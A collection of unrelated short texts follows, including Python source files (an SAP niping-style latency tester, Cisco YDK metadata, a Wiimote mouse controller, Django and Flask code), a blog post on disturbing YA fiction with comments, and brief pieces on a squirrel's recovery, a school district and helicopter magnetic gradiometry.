help="Route string for connecting through a SAP Router")
misc = parser.add_argument_group("Misc options")
misc.add_argument("-v", "--verbose", dest="verbose", action="store_true", help="Verbose output")
misc.add_argument("-B", "--buffer-size", dest="buffer_size", type=int, default=1000,
help="Size of data-buffer [%(default)d]")
misc.add_argument("-L", "--loops", dest="loops", type=int, default=10,
help="Number of loops [%(default)d]")
options = parser.parse_args()
if not options.server and not options.client:
parser.error("Running mode is required")
if options.client and not (options.host or options.route_string):
parser.error("Remote host is required for starting a client")
return options
def client_mode(options):
""""Implements the niping client running mode
:param options: option set from the command line
:type options: Values
"""
times = []
p = Raw("EYECATCHER" + "\x00" * (options.buffer_size - 10))
try:
# Establish the connection
conn = SAPRoutedStreamSocket.get_nisocket(options.host,
options.port,
options.route_string)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect to server o.k.")
# Send the messages
for i in range(options.loops):
# Send the packet and grab the response
start_time = datetime.now()
r = conn.sr(p)
end_time = datetime.now()
# Check the response
if str(r.payload) != str(p):
logging.info("[-] Response on message {} differs".format(i))
# Calculate and record the elapsed time
times.append(end_time - start_time)
# Close the connection properly
conn.send(Raw())
conn.close()
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
if times:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("send and receive {} messages (len {})".format(len(times), options.buffer_size))
# Calculate the stats
times = [x.total_seconds() * 1000 for x in times]
times_min = min(times)
times_max = max(times)
times_avg = float(sum(times)) / max(len(times), 1)
times_tr = float(options.buffer_size * len(times)) / float(sum(times))
times2 = [x for x in times if x not in [times_min, times_max]]
times2_avg = float(sum(times2)) / max(len(times2), 1)
times2_tr = float(options.buffer_size * len(times2)) / float(sum(times2))
# Print the stats
logging.info("")
logging.info("------- times -----")
logging.info("avg {:8.3f} ms".format(times_avg))
logging.info("max {:8.3f} ms".format(times_max))
logging.info("min {:8.3f} ms".format(times_min))
logging.info("tr {:8.3f} kB/s".format(times_tr))
logging.info("excluding max and min:")
logging.info("av2 {:8.3f} ms".format(times2_avg))
logging.info("tr2 {:8.3f} kB/s".format(times2_tr))
logging.info("")
def server_mode(options):
""""Implements the niping server running mode
:param options: option set from the command line
:type options: Values
"""
if not options.host:
options.host = "0.0.0.0"
sock = socket()
try:
sock.bind((options.host, options.port))
sock.listen(0)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("ready for connect from client ...")
while True:
sc, sockname = sock.accept()
client = SAPNIStreamSocket(sc)
logging.info("")
logging.info(datetime.today().ctime())
logging.info("connect from host '{}', client hdl {} o.k.".format(sockname[0], client.fileno()))
try:
while True:
r = client.recv()
client.send(r.payload)
except SocketError:
pass
finally:
logging.info("")
logging.info(datetime.today().ctime())
logging.info("client hdl {} disconnected ...".format(client.fileno()))
except SocketError:
logging.error("[*] Connection error")
except KeyboardInterrupt:
logging.error("[*] Cancelled by the user")
finally:
sock.shutdown(SHUT_RDWR)
sock.close()
# Main function
def main():
options = parse_options()
level = logging.INFO
if options.verbose:
level = logging.DEBUG
logging.basicConfig(level=level, format='%(message)s')
if options.buffer_size < 10:
logging.info("[*] Using minimum buffer size of 10 bytes")
options.buffer_size = 10
# Client running mode
if options.client:
client_mode(options)
# Server running mode
elif options.server:
server_mode(options)
if __name__ == "__main__":
main()
|
ADD A FIXED WINDOW PANEL. Let more light into your shed with a new window.
For more info call us at: 1-800-830-8033.
|
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION, ANYXML_CLASS
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
False,
[
_MetaInfoClassMember('entry', ATTRIBUTE, 'int' , None, None,
[('-2147483648', '2147483647')], [],
''' Single Pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('accepts', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to accept
''',
'accepts',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-long', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Long Format
''',
'deliver_list_long',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('deliver-list-short', ATTRIBUTE, 'str' , None, None,
[], [],
''' Deliver List Short Format
''',
'deliver_list_short',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination IP Address
''',
'destination_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Key Type
''',
'destination_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('destination-value', ATTRIBUTE, 'str' , None, None,
[], [],
''' Destination Port/ICMP Type/IGMP Type
''',
'destination_value',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('drops', ATTRIBUTE, 'int' , None, None,
[('0', '18446744073709551615')], [],
''' Packets matched to drop
''',
'drops',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('flow-type', ATTRIBUTE, 'str' , None, None,
[], [],
''' Flow type
''',
'flow_type',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('ifib-program-time', ATTRIBUTE, 'str' , None, None,
[], [],
''' ifib program time in netio
''',
'ifib_program_time',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-handle', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Interface Handle
''',
'intf_handle',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('intf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' Interface Name
''',
'intf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-fgid', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is FGID or not
''',
'is_fgid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('is-syn', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Is SYN
''',
'is_syn',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l3protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 3 Protocol
''',
'l3protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('l4protocol', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Layer 4 Protocol
''',
'l4protocol',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('listener-tag', ATTRIBUTE, 'str' , None, None,
[], [],
''' Listener Tag
''',
'listener_tag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('local-flag', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Local Flag
''',
'local_flag',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('min-ttl', ATTRIBUTE, 'int' , None, None,
[('0', '255')], [],
''' Minimum TTL
''',
'min_ttl',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('opcode', ATTRIBUTE, 'str' , None, None,
[], [],
''' Opcode
''',
'opcode',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('pending-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' pending ifib queue delay
''',
'pending_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('sl-ifibq-delay', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' sl_ifibq delay
''',
'sl_ifibq_delay',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-addr', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source IP Address
''',
'source_addr',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('source-port', ATTRIBUTE, 'str' , None, None,
[], [],
''' Source port
''',
'source_port',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vid', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' VRF ID
''',
'vid',
'Cisco-IOS-XR-lpts-ifib-oper', False),
_MetaInfoClassMember('vrf-name', ATTRIBUTE, 'str' , None, None,
[], [],
''' VRF Name
''',
'vrf_name',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'entry',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds.SliceId' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds.SliceId',
False,
[
_MetaInfoClassMember('slice-name', ATTRIBUTE, 'str' , None, None,
[], [b'[\\w\\-\\.:,_@#%$\\+=\\|;]+'],
''' Type value
''',
'slice_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('entry', REFERENCE_LIST, 'Entry' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId.Entry',
[], [],
''' Data for single pre-ifib entry
''',
'entry',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-id',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node.SliceIds' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node.SliceIds',
False,
[
_MetaInfoClassMember('slice-id', REFERENCE_LIST, 'SliceId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds.SliceId',
[], [],
''' slice types
''',
'slice_id',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'slice-ids',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes.Node' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes.Node',
False,
[
_MetaInfoClassMember('node-name', ATTRIBUTE, 'str' , None, None,
[], [b'([a-zA-Z0-9_]*\\d+/){1,2}([a-zA-Z0-9_]*\\d+)'],
''' The node name
''',
'node_name',
'Cisco-IOS-XR-lpts-ifib-oper', True),
_MetaInfoClassMember('slice-ids', REFERENCE_CLASS, 'SliceIds' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node.SliceIds',
[], [],
''' Slice specific
''',
'slice_ids',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'node',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib.Nodes' : {
'meta_info' : _MetaInfoClass('LptsIfib.Nodes',
False,
[
_MetaInfoClassMember('node', REFERENCE_LIST, 'Node' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes.Node',
[], [],
''' Per node slice
''',
'node',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'nodes',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
'LptsIfib' : {
'meta_info' : _MetaInfoClass('LptsIfib',
False,
[
_MetaInfoClassMember('nodes', REFERENCE_CLASS, 'Nodes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper', 'LptsIfib.Nodes',
[], [],
''' Node ifib database
''',
'nodes',
'Cisco-IOS-XR-lpts-ifib-oper', False),
],
'Cisco-IOS-XR-lpts-ifib-oper',
'lpts-ifib',
_yang_ns._namespaces['Cisco-IOS-XR-lpts-ifib-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_lpts_ifib_oper'
),
},
}
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId.Entry']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds.SliceId']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info']
_meta_table['LptsIfib.Nodes.Node.SliceIds']['meta_info'].parent =_meta_table['LptsIfib.Nodes.Node']['meta_info']
_meta_table['LptsIfib.Nodes.Node']['meta_info'].parent =_meta_table['LptsIfib.Nodes']['meta_info']
_meta_table['LptsIfib.Nodes']['meta_info'].parent =_meta_table['LptsIfib']['meta_info']
|
Nichole Giles, YA Author: Newsflash: All YA Books are Disturbing.
Newsflash: All YA Books are Disturbing.
On Wednesday, I questioned whether or not my son’s teacher had the right to give low marks to a short story based on the fact that she found the premise disturbing.
Here’s the thing. They should. They really should. But that doesn’t mean they do.
If my son’s teacher is smart, she would have read, I don’t know, maybe, The Hunger Games. Or, To Kill a Mockingbird, or The Scarlett Letter, Lord of the Flies, Shakespeare, or any number of the current popular Vampire/werewolf/paranormal/fantasy/dystopian books. But maybe she’s not a fan of the fantastical. Maybe she prefers YA issue books. Still.
Here’s the thing: ALL those books are disturbing in one way or another. Heck, being a teenager is disturbing. They read about post apocalyptic societies in which children are forced to fight to the death. About deadly creatures who roam earth, right under the noses of the clueless public. They read about addiction, abuse, neglect, cruelty, and all manner of emotional trauma. They read about *gasp* the kind of true love that makes you do stupid things—like ask to become a vampire. Or a faery.
Show me a YA book that isn’t disturbing in one way or another, and I’ll show you a YA book only being read by adults. And not by many.
Is it really a shocker to discover that these teen readers write similar stories?
But then, I say that assuming the teacher in question has read any of these books. Because, as mentioned above, just because she should doesn’t mean she has. Or does. Or will. However, if she hasn’t, how is she able to fairly grade papers written by the kids who are her students?The ones who read disturbing books?
As mentioned earlier, I respect that teacher’s ability to grade papers based on opinion. Even when the technical aspects have been efficiently handled. But I am also troubled by her choice to discourage any kid from expressing their creativity in the best way they know by downgrading their paper for being disturbing.
I believe kids have a hundred times more power than adults behind their creative instincts, because they have not yet learned to care what others think of their work. They write, dance, create, play, and dream just because they can. It is only as they become adults and have numerous people working to convince them that they aren’t good enough, that they actually start to believe it’s true.
Again, I ask you. Does an adult—especially a teacher—have the right to begin the cycle of “I’m not good enough” for a child? Even if that child is on the verge of adulthood?
Adults do it all the time. We try not to, I try not to--but isn't that what domesticating kids is about?
"Sit still . . . stop talking . . . walk in a straight line, and would you stop laughing so loud?!"
Many kids are outside the box thinkers, a lot of adults are too, but a lot of teachers are inside the box thinkers(not all of them, to be fair). Directions must be followed to a tee, and order is more important than creativity.
Sorry, am I ranting too much? I'm sorry about what happened with your son's story, but now I'm curious: What did he write about that was so disturbing?
oh man, that would make me so mad. Nobody has the right to stifle someone's creativity. What if that person becomes discouraged and never tries again?
Finding the premise disturbing is not an acceptible excuse for giving a low grade. But ... the same thing happened to me. I did an art project in my junior year. Anyway, the teacher gave me the lowest grade without actually failing me. When I asked her why, she said she didn't think I should be focusing on that subject matter -- even though the assignment was to do whatever we wanted to do in that medium.
Teachers have an amazing ability to inspire their students. All it takes is one comment to either encourage or deflate. I waited a hundred years to start writing. Okay, maybe not a hundred, but a whole bunch because of the influence of teachers. I hope that your son is able to find the positive influence he needs to continue creating. Thanks for your post.
I think the fact that the teacher found it disturbing means that some good writing was going on. I think you should challenge her on it.
I had this same thought. All YA is disturbed. Truthfully, isn't almost all story disturbing? It always has conflict--rising conflict--and the stories that really change us and make us think are the ones that dare.
I'm glad your son has you because even if his teacher doesn't "get" this one, you do and you won't let him be stifled.
It leads back to what I said before. Technical grade vs Content grade. And the content is too subjective, so it isn't fair to grade that way. And I think English teachers have a hard job. But it's like writing an opinion piece, right? If the teacher didn't agree with their opinion, would they have automatically had a bad grade because of the teacher's personal beliefs? This isn't math, it's not quantitative with a right/wrong answer. So they need to remove all the qualitative aspects of it in order to grade fairly.
P.S. Your font color and background in the comments section make it impossible to read previous comments without highlighting them. You may want to darken one of those things.
So not fair! You shouldn't grade a paper on whether it's disturbing or not.
Three years ago my daughter wrote a horribly disturbing story. I couldn't believe it had come from her. However, I was proud of her at the same time for her tremendous writing ability! And, fortunately for us, her teacher agreed and felt completely fine with the content. I did feel very grateful for that, so I can imagine how you feel not receiving the kind of support your son should have gotten.
Solid, thoughtful points. To disturb is one of the purposes of narrative and if you strip it of evil you strip it of interest. Of course, we want to protect kids from gratuitous evil, or narrative that actually promotes or glorifies wrongdoing, but we can't keep them from knowing it exists - or they'll find out when we're not around!
|
#coding: utf-8
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%=1d%f!jg072%x^01%j6-*_q@a431ep$%o0@59zux)ns3w$ghu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
Delmarva Fox Squirrel – Conservation Success Story!
Due to conservation efforts by states, landowners and other partners the Delmarva Peninsula fox squirrel, one of the animals included on the first list of endangered species nearly half a century ago, has recovered. Based on extensive review of the best scientific and commercial data available The U.S. Fish and Wildlife Service determined that the Delmarva fox squirrel, as it is more commonly called, is no longer in danger of extinction through all or a significant part of its range, and it is not likely to become so within the foreseeable future.
|
import cwiid
import time
import uinput
class WiiMote (object):
def __init__(self,addr=None):
#save the wiimote address for later reference
self.addr = addr
#connect to the wiimote
self.mote = None
while self.mote is None:
try:
self.mote = cwiid.Wiimote()
except RuntimeError as e:
print "failed to connect to wiimote."
#for debugging, turn 1 LED on.
self.mote.led = 1
self.ledNum = 1
#prepare the callback list:
self.calls = {
'2':None,
'1':None,
'b':None,
'a':None,
'minus':None,
'home':None,
'left':None,
'right':None,
'down':None,
'up':None,
'plus':None
}
#prep the reactor variable.
self.react = False
#turn on the wiimote's reporting for buttons
self.mote.rpt_mode = cwiid.RPT_BTN
#initialize the mouse controller
self.mouse = uinput.Device([
uinput.BTN_LEFT,
uinput.BTN_RIGHT,
uinput.REL_X,
uinput.REL_Y
])
self.lstate = 0
self.rstate = 0
def start(self):
'''
Start the reactor loop that listens for WiiMote events so the appropriate call back
can be called.
'''
self.react = True
while self.react:
time.sleep(0.01)
bstate = self.mote.state['buttons']
if bstate % 2 and self.calls['2'] is not None:
self.calls['2'](wm)
if bstate / 2 % 2 and self.calls['1'] is not None:
self.calls['1'](wm)
# if bstate / 4 % 2 and self.calls['b'] is not None:
# self.calls['b'](wm)
# if bstate / 8 % 2 and self.calls['a'] is not None:
# self.calls['a'](wm)
if bstate / 16 % 2 and self.calls['minus'] is not None:
self.calls['minus']()
if bstate / 128 % 2 and self.calls['home'] is not None:
self.calls['home']()
if bstate / 256 % 2 and self.calls['left'] is not None:
self.calls['left']()
if bstate / 512 % 2 and self.calls['right'] is not None:
self.calls['right']()
if bstate / 1024 % 2 and self.calls['down'] is not None:
self.calls['down']()
if bstate / 2048 % 2 and self.calls['up'] is not None:
self.calls['up']()
if bstate / 4096 % 2 and self.calls['plus'] is not None:
self.calls['plus']()
leftClick(wm)
rightClick(wm)
def stop(self):
'''
stops the reactor loop.
'''
pass
def release(self):
'''
releases the wiimote, which should effectively turn it off.
'''
pass
def testOut():
print wm.mote.state['buttons']
def callmeMaybe():
print "I was called!"
def countUp():
wm.ledNum = (wm.ledNum + 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 1
wm.mote.led = int(wm.ledNum)
def countDown():
wm.ledNum = (wm.ledNum - 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 16
wm.mote.led = int(wm.ledNum)
def mousetickDown():
mousetick(0,int(wm.ledNum))
def mousetickUp():
mousetick(0,int(-1*wm.ledNum))
def mousetickLeft():
mousetick(int(-1*wm.ledNum),0)
def mousetickRight():
mousetick(int(wm.ledNum),0)
def mousetick(x,y):
wm.mouse.emit(uinput.REL_X,x)
wm.mouse.emit(uinput.REL_Y,y)
def leftClick(wm):
state = wm.mote.state['buttons'] / 8 % 2
if state != wm.lstate:
wm.mouse.emit(uinput.BTN_LEFT,state)
# wm.mouse.emit(uinput.BTN_LEFT,1)
wm.lstate = state
def rightClick(wm):
wm.mouse.emit(uinput.BTN_LEFT,0)
if __name__ == "__main__":
wm = WiiMote()
wm.calls['2'] = testOut
wm.calls['1'] = testOut
wm.calls['b'] = leftClick
wm.calls['a'] = rightClick
wm.calls['minus'] = countDown
wm.calls['home'] = callmeMaybe
wm.calls['left'] = mousetickLeft
wm.calls['right'] = mousetickRight
wm.calls['down'] = mousetickDown
wm.calls['up'] = mousetickUp
wm.calls['plus'] = countUp
wm.start()
|
This experiment was an attempt to show that what can be characterized as 'awareness' (or even 'intelligence') can be simulated using only very basic physics. The environment is a zero-gravity three dimensional space seeded with 'cubes' and 'food pellets.' Food pellets are regularly added to the space in random positions. If a cube connects with a food pellet the pellet is 'consumed' and the cube's lifespan is increased, and if it survives for long enough it will replicate itself. Each cube has six sides, and each side has a randomized 'polarity,' positive or negative. Positive sides of cubes are attracted to the negatively-charged food pellets while negative sides are repelled by them.
What results is the cubes having surprisingly evocative food-seeking behavior. Generally a cube will 'choose' a side, edge, or vertex around which its net attractive force is the strongest. This becomes the cube's 'front,' pointing towards and accelerating towards food.
The fact that negative sides repel food leads to the surprisingly effective emergent strategy of 'focusing' on one food pellet while ignoring others. This gives cubes with both negative and positive sides a distinct advantage over cubes which are generated with all-positive sides, as these cubes have difficulty finding food because they are 'distracted' by all of the food pellets around them.
|
import datetime
import time
from django import forms
from django.contrib.admin.widgets import FilteredSelectMultiple
from boar.articles.models import Article, Tag
from boar.articles.widgets import MarkItUpWidget
class ArticleAdminModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
# Make TagManager act like a ManyToManyField
if 'initial' not in kwargs:
kwargs['initial'] = {}
if kwargs.get('instance', None):
opts = self._meta.model._meta
for f in sorted(opts.fields + opts.many_to_many):
if f.name == 'tags':
if kwargs['instance'].pk is None:
kwargs['initial'][f.name] = []
else:
kwargs['initial'][f.name] = [obj.tag.pk for obj in f.value_from_object(kwargs['instance'])]
super(ArticleAdminModelForm, self).__init__(*args, **kwargs)
if 'pub_date' in self.initial and isinstance(self.initial['pub_date'], basestring):
self.initial['pub_date'] = datetime.datetime(*time.strptime(self.initial['pub_date'], '%Y-%m-%d %H:%M:%S')[:6])
summary = forms.CharField(
required=False,
widget=forms.Textarea(attrs={'id': 'summary', 'rows': '5', 'cols': '80'}),
help_text=Article._meta.get_field('summary').help_text
)
body = forms.CharField(
widget=MarkItUpWidget(),
help_text=Article._meta.get_field('body').help_text
)
tags = forms.ModelMultipleChoiceField(
queryset=Tag.objects.all(),
widget=FilteredSelectMultiple('Tags', False),
required=False,
help_text=Article._meta.get_field('tags').help_text
)
class Meta:
model = Article
class ArticleArchiveForm(forms.Form):
def __init__(self, *args, **kwargs):
qs = kwargs['qs']
del(kwargs['qs'])
super(ArticleArchiveForm, self).__init__(*args, **kwargs)
self.fields['month'].choices = [(d.strftime('%Y-%b').lower(), d.strftime('%B %Y')) for d in qs.dates('pub_date', 'month')]
month = forms.ChoiceField(choices=[])
|
Lake Washington School District (LWSD) is located between Lake Washington and the Cascade Mountains. The district is east of Seattle and covers 76 square miles. LWSD is the public school district for the cities of Kirkland, Redmond and about half of Sammamish. On the north end of the district, some Bothell and Woodinville residents also attend our schools. The district map shows school locations.
Note: grade levels may vary in choice schools. Schools that serve more than one grade level are counted in each grade level they serve.
|
import json
from flask import Blueprint, Response, request
from liebraryrest.models import Book, User, Booking
blueprint = Blueprint('books', __name__, url_prefix='/api/books')
@blueprint.route('')
def book_list():
return Response(json.dumps(Book.serialize_list(Book.query.all())),
mimetype='application/json',
status=200)
@blueprint.route('/<book_isbn>')
def book_show(book_isbn):
book = Book.get_by_isbn(book_isbn)
if book is not None:
return Response(book.to_json(),
mimetype='application/json',
status=200)
return Response(json.dumps("No book found with isbn {}".format(book_isbn)),
mimetype='application/json',
status=404)
@blueprint.route('/<book_isbn>/bookings', methods=['POST'])
def booking_on_a_book(book_isbn):
try:
request_body = json.loads(request.data.decode('UTF-8'))
user_id = request_body['user_id']
except (ValueError, KeyError):
return Response(
json.dumps("Invalid JSON or missing user_id param"),
mimetype='application/json',
status=400)
book = Book.get_by_isbn(book_isbn)
user = User.get_by_id(user_id)
if (book is not None) and (user is not None):
booking = Booking.get_by_isbn_and_user_id(book.isbn, user.id)
if booking is not None:
return Response(
json.dumps("This book {} is already on the booking list of user {}"
.format(book.isbn, user.id)),
mimetype='application/json',
status=400
)
if book.is_available():
book.quantity -= 1
book.save()
booking = Booking(book, user)
booking.save()
return Response(booking.to_json(),
mimetype='application/json',
status=201)
return Response(json.dumps("Book {} is not available for booking".format(book_isbn, user_id)),
mimetype='application/json',
status=400)
return Response(json.dumps("Unable to find Book: {} or user: {}".format(book_isbn, user_id)),
mimetype='application/json',
status=404)
|
Mineral explorations require high-resolution aeromagnetic data for geological mapping and structural interpretations. Since direct detection of mineral deposits, for example gold, is not always possible, we have to rely on indirect detection of mineralized bodies by investigating the host rocks (geological mapping), traps, faults, shear zones (structures). The aeromagnetic data collected from the Tri-axial Gradiometer (HeliGrad) system meet those exploration needs.
Many of the advanced magnetic data interpretation techniques, such as the Euler Deconvolution (Reid et al, 1996), Source Parameter Imaging (Thurston and Smith, 1997), use magnetic gradients. Measured magnetic gradients do not depend on the Earth’s magnetic field and are not affected by diurnal variations. Therefore, the calculated magnetic grids can be made more accurate using the measured gradients (Hardwick, 1999 and Reford, 2004). Complex magnetic 2D or 3D inverse models can be better constrained and more easily resolved with gradient data. The magnetic data between the survey lines can be better extrapolated using the measured cross-line gradients.
The HeliGrad system (Figure 1a) is a helicopter-borne tri-axial magnetic gradiometer platform which collects full magnetic gradient data in three principle directions, in-line, cross-line and vertical (Figure 1b). The system uses a GPS receiver and a Gyro Inclinometer to provide positions and orientations of the gradiometers in real-time. Magnetic data distortions due to deviations from the horizontal, in-line and cross-line vertical planes of the gradiometers are corrected during post processing, therefore improving the quality of the final delivered magnetic data. The correction methods will be discussed.
Figure 1: A) HeliGrad tri-axial helicopter magnetic gradiometer system. B) HeliGrad tri-axial gradiometer configuration and dimensions. C) Opikeigen Lake Gold property location in Uchi Subprovince of Canadian Superior Province,in northern Ontario (courtesy SLAM Exploration Inc.).
The four magnetometers of the HeliGrad system are mounted on a rigid non-magnetic frame (Figure 1b). As a result, the relative positions of the four sensors remain unchanged. A GPS receiver and a Gyro Inclinometer are mounted on the platform to monitor its position and orientation at all time. The gradiometer can pitch drastically during climb and flying into a head wind. Of course it can swing from side to side as well in windy conditions. In order to provide true gradients along the ideal in-line, cross-line and vertical directions, tilt corrections must be applied to the magnetic data collected.
